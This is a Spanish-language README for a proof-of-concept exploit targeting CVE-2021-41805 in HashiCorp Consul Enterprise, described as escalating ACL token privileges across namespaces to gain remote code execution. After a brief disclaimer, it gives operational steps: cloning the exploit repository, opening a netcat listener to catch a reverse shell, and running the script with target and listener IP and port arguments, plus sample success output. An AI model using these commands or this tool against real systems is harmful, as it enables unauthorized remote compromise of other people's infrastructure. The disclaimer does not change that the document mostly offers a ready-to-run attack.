
Una prueba de concepto para CVE-2021-41805 que es una vulnerabilidad en HashiCorp Consul Enterprise que permite la ejecución remota de código (RCE) con privilegios elevados.
[!WARNING] AVISO LEGAL: ¡Esta herramienta es ESTRICTAMENTE solo para FINES EDUCATIVOS! El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ILEGAL. Es responsabilidad del usuario cumplir con todas las leyes aplicables al usar esta herramienta. El desarrollador de esta herramienta no asume ninguna responsabilidad ni es responsable por cualquier mal uso o daño causado por este programa.
Un token ACL (con los permisos predeterminados operator:write) en un namespace puede ser utilizado para una escalada de privilegios no deseada en un namespace diferente. Esto se puede abusar para obtener Ejecución Remota de Código (RCE) con privilegios elevados.
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <LISTENER_PORT>python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPCIONAL: -t <ACL token> -v (detallado) -s (usar SSL)]
Ejecutando el exploit con los argumentos básicos: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [Usar SSL]) dará una salida básica como:
[*] The PUT request was made successfully. Check your listener...
Ejecutando el exploit con los argumentos básicos más -v [VERBOSE] dará una salida detallada:

Si ocurre un error al ejecutar el exploit y se especifica el argumento -v, la salida será algo como:
